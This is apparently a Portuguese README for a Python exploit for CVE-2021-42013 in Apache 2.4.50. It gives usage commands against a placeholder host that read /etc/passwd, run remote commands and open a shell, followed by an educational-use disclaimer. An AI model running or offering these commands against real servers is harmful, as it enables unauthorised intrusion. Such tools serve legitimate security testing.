
CVE-2021-42013 - Apache 2.4.50
Um script python3 para o CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI & RCE. O RCE requer que o cgi-bin esteja ativado.
python3 apache_2.4.50.py -t http://apache.hack/ -lfi /etc/passwd
python3 apache_2.4.50.py -t http://apache.hack/ -rce whoami
python3 apache_2.4.50.py -t http://apache.hack/ -shell
Para o menu de ajuda:
python3 apache_2.4.50.py -h
Todo o código fornecido neste repositório é apenas para fins educacionais/pesquisa. Quaisquer ações e/ou atividades relacionadas ao material contido neste repositório são de sua exclusiva responsabilidade. O uso indevido do código deste repositório pode resultar em acusações criminais contra as pessoas em questão. O autor não será responsabilizado no caso de quaisquer acusações criminais serem apresentadas contra qualquer pessoa que use indevidamente o código deste repositório para infringir a lei.